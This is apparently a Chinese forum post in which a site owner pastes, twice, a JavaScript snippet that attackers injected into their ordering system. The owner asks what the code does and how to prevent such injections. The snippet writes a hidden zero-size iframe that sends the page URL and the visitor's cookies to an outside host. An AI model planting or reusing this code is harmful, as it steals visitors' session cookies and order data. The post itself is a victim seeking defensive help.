网站含有订单程序,被人嵌入JS路径文件,代码如下:
var code;
var target ="http://xxxxxx/ys.asp?";
info=escape(document.location+"@@@"+document.cookie);
target=target+info;
code="<iframe style='display:none;' src=";
code=code+target;
code=code+" width=0 height=0></iframe>";
document.write(code);
请教,这段代码是做什么用的???
var code;
var target ="http://xxxxxx/ys.asp?";
info=escape(document.location+"@@@"+document.cookie);
target=target+info;
code="<iframe style='display:none;' src=";
code=code+target;
code=code+" width=0 height=0></iframe>";
document.write(code);
请教,这段代码是做什么用的???
就是这么回事日,对手恶意搞的,想窃取我们的订单,通过在订单程序里嵌入<script>..</script>,这种情况,有什么办法防吗?